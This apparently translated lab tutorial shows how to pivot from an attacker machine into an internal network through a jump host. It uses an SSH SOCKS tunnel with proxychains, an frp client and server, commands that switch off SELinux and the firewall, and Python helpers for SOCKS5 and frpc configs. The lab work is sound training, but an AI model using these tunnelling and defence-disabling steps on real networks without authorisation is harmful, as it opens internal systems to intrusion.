1. Preparation work
Three machines are needed. Prepare win7 (target host), kali (attacker) and Red Hat (springboard, i.e. the jump host).
Attacker (kali): 192.168.10.15
Springboard (Red Hat): 192.168.10.13
Springboard intranet interface (Red Hat): 192.168.11.1
Target (intranet win7): 192.168.11.20
Kali is the attacker on the external network, win7 is on the internal network, and Red Hat sits between them: one of its interfaces faces the external network (kali) and the other faces the internal network (win7).
The procedure is:
1. Adjust the network. Kali can ping Red Hat, but cannot ping win7 on the intranet or Red Hat's intranet segment.
Red Hat can ping everything.
Win7 can ping Red Hat. As for pinging Kali, in theory Win7 should be able to ping Kali, but with my settings it doesn't work.
2. Method display
Method 1 (proxychains4)
kali listens locally and connects to Red Hat, then uses proxychains4 to build a dedicated channel to win7. We access port 80 on win7 to demonstrate the result, which requires a website to be built there; I use phpstudy. Let's try this one first.
Method 2 (frp)
This part was added two months later. There are still three machines (attacker: kali, springboard: a kali clone, target: ubuntu). Let's go over the general idea first and come back to the specific demonstration afterwards.
Kali acts as the frp server and the kali clone as the client. The client sets the service ports it wants to expose in its configuration file and actively connects out to the server to expose its own intranet (nothing needs to be touched on Ubuntu once its network is configured). The attacker kali can then reach the intranet through the socks5 tunnel that frp builds, using a proxychains connection, and Windows can also reach the intranet through the remote ports.
2. Network configuration
This is the configuration of my vmnet1
vmnet8 settings
kali's IP: 192.168.10.5
Red Hat: 192.168.10.13
and 192.168.11.1
Note that my second network card is numbered 37, so here it is ens37; check ifconfig to see which name applies on your machine.
This configuration file was made by cp'ing the ens33 one, since the one for ens37 turned out not to exist; you can create it yourself.
systemctl restart network
win7
On Win7, go to the network adapter settings to configure the network.
After the configuration is done, run ipconfig /release and ipconfig /renew in cmd.
Turn off routing forwarding on Red Hat
vim /proc/sys/net/ipv4/ip_forward
A value of 0 means IP forwarding is disabled.
Turn off the Red Hat firewall
setenforce 0
systemctl stop firewalld
Turn off the win7 firewall
3. Start implementation
Method 1 (proxychains4)
Query the routes on kali: there is only the local 192.168.10.0 segment (I don't know what 172.17.0.0 is); in any case there is no 192.168.11.0 segment.
route -n
Listen on port 4444
Enter on the attacker machine:
ssh -CfNg -D 4444 [email protected] (the address of the springboard machine, which is in the same network segment as the attacker)
-C compresses the transmitted data
-f sends ssh to the background after user authentication. This option is very useful, and it can also be used with accounts that have no login shell.
-N does not execute any remote command or script
-g allows remote hosts to connect to the forwarded port (without it, the SOCKS listener on 4444 is bound to localhost only)
netstat -pantu | grep 4444
If a process shows up there and you need to stop it, use kill plus the process ID (e.g. kill 60529).
vim /etc/proxychains4.conf (or, on some systems, /etc/proxychains.conf) and add:
socks5 127.0.0.1 4444
Why do I use socks5? Because my competition requires it. You can use socks4.
Save and exit
proxychains4 firefox 192.168.11.20:80
Running this command shows win7's port 80 service: the phpStudy (小皮) panel I installed on win7, with the default website I set (4 1111).
Success
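As an added illustration (not code from the original post), the Python below performs the same SOCKS5 exchange that proxychains4 carries out on your behalf through the ssh -D 4444 listener: the no-auth greeting, a CONNECT to 192.168.11.20:80, and parsing of the reply. It lets you verify from a script that the tunnel is up, and shows what such traffic looks like on the wire; the proxy and target addresses are the ones used in this lab.

```python
import socket
import struct

SOCKS_VER = 5
REPLY_TEXT = {0: "succeeded", 1: "general failure", 2: "not allowed by ruleset",
              3: "network unreachable", 4: "host unreachable", 5: "connection refused"}

def build_greeting():
    """Client hello: version 5, one auth method offered (0x00 = no authentication)."""
    return bytes([SOCKS_VER, 1, 0x00])

def build_connect(host, port):
    """CONNECT request; dotted-quad hosts use ATYP 1 (IPv4), anything else ATYP 3 (domain name)."""
    try:
        addr = b"\x01" + socket.inet_aton(host)
    except OSError:
        name = host.encode()
        addr = b"\x03" + bytes([len(name)]) + name
    return bytes([SOCKS_VER, 1, 0]) + addr + struct.pack(">H", port)

def parse_connect_reply(data):
    """Return (reply_code, reply_text) from the server's CONNECT response."""
    if len(data) < 2 or data[0] != SOCKS_VER:
        raise ValueError("not a SOCKS5 reply")
    return data[1], REPLY_TEXT.get(data[1], "unknown")

def socks5_connect(proxy_host, proxy_port, dest_host, dest_port, timeout=5):
    """Open a TCP connection to dest through the SOCKS5 proxy (here the ssh -D 4444 listener)."""
    s = socket.create_connection((proxy_host, proxy_port), timeout=timeout)
    s.sendall(build_greeting())
    if s.recv(2) != bytes([SOCKS_VER, 0x00]):
        s.close()
        raise ConnectionError("proxy refused the no-auth method")
    s.sendall(build_connect(dest_host, dest_port))
    code, text = parse_connect_reply(s.recv(262))  # 262 = longest possible reply
    if code != 0:
        s.close()
        raise ConnectionError(f"SOCKS5 CONNECT failed: {text}")
    return s  # now a plain TCP stream to dest_host:dest_port

if __name__ == "__main__":
    # Same path as "proxychains4 firefox 192.168.11.20:80" above, without proxychains.
    conn = socks5_connect("127.0.0.1", 4444, "192.168.11.20", 80)
    conn.sendall(b"HEAD / HTTP/1.0\r\nHost: 192.168.11.20\r\n\r\n")
    print(conn.recv(256).decode(errors="replace"))
    conn.close()
```

Because the ssh command above uses -g, the 4444 listener is reachable from any host that can reach kali, so the same exchange works from other machines on that segment; drop -g if only local tools need the tunnel.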
Method 2 (frp)
You can't get frp with apt (at least I couldn't). I downloaded the compressed package online and installed it myself; refer to this blogger for the details.
wget https://github.com/fatedier/frp/releases/download/v0.33.0/frp_0.33.0_linux_amd64.tar.gz
Unzip it after downloading.
I didn't manage to decompress it that way; I extracted it graphically and then put it in place.
Now let's reorganise the network:
Attacker (kali): 10.10.10.130
Springboard (kali clone): 10.10.10.128
Springboard intranet interface (kali clone): 192.168.10.34
Target (intranet ubuntu): 192.168.10.22
kali and the kali clone are on vmnet1.
The kali clone and ubuntu are on NAT.
This is more convenient: kali can ping the kali clone but cannot reach ubuntu.
Ubuntu and the kali clone can reach every target.
It's a bit of a shortcut, but it meets the environment's requirements.
On both kali and the kali clone, run
wget https://github.com/fatedier/frp/releases/download/v0.33.0/frp_0.33.0_linux_amd64.tar.gz
Download and unzip.
kali (attacker) acts as the server; its configuration file is frps.ini, which you can leave unchanged.
The port used to connect to the server is set there; the default is 7000.
The kali clone (springboard) acts as the client; modify frpc.ini (note: frpc, not frps).
[common]
server_addr = 10.10.10.130
server_port = 7000

[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 22
remote_port = 6000

#[web]
#type = http
#local_ip = 127.0.0.1
#local_port = 80
#subdomain = test.hijk.pw # web domain
#remote_port = 8082

[socks5]
type=tcp
remote_port=4444
plugin=socks5

[redis]
type=tcp
local_ip=127.0.0.1
local_port=6379
remote_port=6666
These are the services I need. I'll take one out to explain separately.
[ssh]
type = tcp              a TCP connection, not much to say
local_ip = 127.0.0.1    maps to this local address
local_port = 22         and this local port
remote_port = 6000      for remote access you only need to connect to port 6000 on the server
The next section is a must-have; it is what builds the tunnel:
[socks5]
type=tcp
remote_port=4444
plugin=socks5
sudo mkdir -p /etc/frp
sudo cp frps.ini /etc/frp
sudo cp frps /usr/bin
sudo cp systemd/frps.service /usr/lib/systemd/system/
sudo systemctl enable frps
sudo systemctl start frps
I forget whether I used the commands above; I was referring to this article at the time.
They should be used, and you should use them too. Pay attention to your paths; you don't need to read the rest of his article.
On the kali clone (springboard), run
./frpc -c frpc.ini
Pay attention to your path.
The yellow part is because, in my earlier configuration file, the redis section and the ssh section both used remote port 6000, so the same port was written twice.
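As an added check (not part of the original post), the Python below parses an frpc.ini in the format shown above and reports which remote ports the client asks the server to open, which of them collide (the duplicate-6000 mistake described above), and which sections are socks5 plugin proxies that give anyone who can reach server_addr:remote_port a path into the client's network. The sample config is constructed here and deliberately reuses port 6000 to reproduce the collision.

```python
import configparser
from collections import defaultdict

# Constructed sample in the same format as the frpc.ini shown above; the [redis]
# section deliberately reuses remote_port 6000 to reproduce the collision
# described in the text (two proxies asking the server for the same port).
SAMPLE_FRPC_INI = """
[common]
server_addr = 10.10.10.130
server_port = 7000

[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 22
remote_port = 6000

[socks5]
type=tcp
remote_port=4444
plugin=socks5

[redis]
type=tcp
local_ip=127.0.0.1
local_port=6379
remote_port=6000
"""

def parse_frpc(text):
    """Return {section: {key: value}} for every proxy section (everything but [common])."""
    cfg = configparser.ConfigParser()
    cfg.read_string(text)
    return {s: dict(cfg[s]) for s in cfg.sections() if s != "common"}

def check_frpc(text):
    """Report remote_port collisions and proxies that expose a socks5 plugin."""
    proxies = parse_frpc(text)
    by_port = defaultdict(list)
    for name, p in proxies.items():
        if "remote_port" in p:
            by_port[int(p["remote_port"])].append(name)
    collisions = {port: names for port, names in by_port.items() if len(names) > 1}
    # A socks5 plugin proxy turns server_addr:remote_port into an open door into
    # the client's network, so list those sections explicitly.
    open_socks = [n for n, p in proxies.items() if p.get("plugin") == "socks5"]
    return {"remote_ports": dict(by_port), "collisions": collisions, "socks5_proxies": open_socks}

if __name__ == "__main__":
    print(check_frpc(SAMPLE_FRPC_INI))
```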
Then there are two ways to use it from kali, provided the socks5 section is set up.
1. Use proxychains
On the kali attacker machine, edit
/etc/proxychains.conf
and use in the terminal:
proxychains firefox 192.168.10.22:80
Success. This is equivalent to using the socks5 proxy built by frp and then going through proxychains to reach the intranet, which is similar to method 1.
2. Use the remote port directly
This is the real use of frp.
Prerequisite: the springboard, the attacker and Ubuntu all allow ssh.
We access port 6000 on the server directly:
[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 22
remote_port = 6000
On Windows, use: ssh [email protected] -p 6000
Here I did not ssh into the springboard directly; what I wanted to show is that I reached the springboard through port 6000 on the server, which demonstrates what frp does.